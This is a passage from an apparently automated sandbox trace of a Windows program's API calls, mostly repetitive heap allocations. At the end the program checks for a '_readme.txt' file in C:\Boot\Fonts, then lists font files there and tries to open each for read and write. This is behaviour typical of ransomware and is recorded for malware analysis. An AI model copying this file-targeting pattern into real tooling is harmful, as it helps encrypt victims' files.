Size=0x840) returned 0x328ec10 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.752] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.752] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.753] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.753] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.754] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.754] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.755] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.755] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.756] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.756] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.756] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.756] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.756] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.756] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.756] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.756] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.756] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.756] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.756] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.756] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0146.756] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.756] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.756] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.756] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.756] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.756] PathFindFileNameW (pszPath="") returned="" [0146.756] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.756] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.756] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.756] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.756] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.756] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.757] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.757] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.757] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.757] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.757] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.757] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.757] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.757] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.757] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.757] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x81c) returned 0x328ec10 [0146.757] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0146.757] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.757] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.757] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0146.757] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.757] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.757] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.757] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.757] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.757] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0146.757] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.757] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.757] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.757] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\chs_boot.ttf") returned=".ttf" [0146.757] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.758] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.758] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0146.758] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.758] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.758] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.758] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\cht_boot.ttf") returned=".ttf" [0146.758] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.759] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.759] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0146.759] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.759] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.759] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.759] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\jpn_boot.ttf") returned=".ttf" [0146.759] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.759] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6be0 | out: hHeap=0x6e0000) returned 1 [0146.759] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0146.759] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.759] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.759] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.759] PathFindExtensionW (pszPath="C:\\Boot\\Fonts\\kor_boot.ttf") returned=".ttf" [0146.759] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: 